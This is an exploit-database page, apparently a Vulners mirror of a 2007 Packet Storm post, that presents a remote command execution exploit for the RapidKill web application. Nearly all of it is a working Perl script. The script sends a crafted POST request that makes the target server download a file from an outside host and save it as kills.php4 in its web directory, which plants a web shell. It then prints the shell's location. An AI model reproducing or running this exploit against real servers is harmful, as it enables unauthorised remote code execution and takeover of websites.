Lucene search
K

rapidkill.txt

🗓️ 24 Jan 2007 00:00:00Reported by Red_DragonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Remote command execute vulnerability in RapidKill application affecting all versions. Exploit code allows remote attackers to create a shell on the target system

Code
`Application : RapidKill  
Vulnerability Kind : Remote command execute  
Product Link : http://www.rapidkill.net  
version : All Versions Affected  
mail: [email protected]  
Author : Black-0ut  
  
exploit :  
  
#/usr/bin/perl  
use URI::Escape;  
use IO::Socket;  
  
$ha=$ARGV[0];  
$pa=$ARGV[1];  
$file="kills.php4";  
  
if (!$ARGV[1]) {  
print"\n";  
print "[+] Coded By Red_Dragon or H3CT0R3 [+]\n";  
print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n";  
print "[+] Persian site: http://www.onhackerline.ir/ [+] \n";  
print "[+] English site: http://www.onhackerline.com/ [+] \n";  
print "[+] RapidKill [+] \n";  
print "[+] Black 0ut Frenzy Team [+] \n";  
print "[+] On Hacker Line WhiteHat Team [+] \n";  
print "[+] E-mail : [email protected] [+] \n";  
print"\n";  
print "ex : www.ex.com /path/\n";  
exit;  
}  
uri_escape($com);  
$sock =  
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ha",PeerPort=>"80") || die  
"[-] Unable to retrieve: $!";  
  
$sendurl =  
"FileName=".$file."&host=www.edseek.org&path=%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&referer=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&email=&partSize=&method=tc&proxy=&saveto=/home/webmixi/public_html/rapid&link=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt";  
$sendlen = length($sendurl);  
print $sock "POST ".$pa."/index.php HTTP/1.1\n";  
print $sock "Host: ".$ha."\n";  
print $sock "Connection: close\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "Content-Length: ".$sendlen."\n\n";  
print $sock $sendurl;  
print "Creating Shell...Plz W8\n\n";  
while($recvd = <$sock>)  
{  
print " ".$recvd."";  
}  
print "shell: ".$ha.$pa.$file;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
22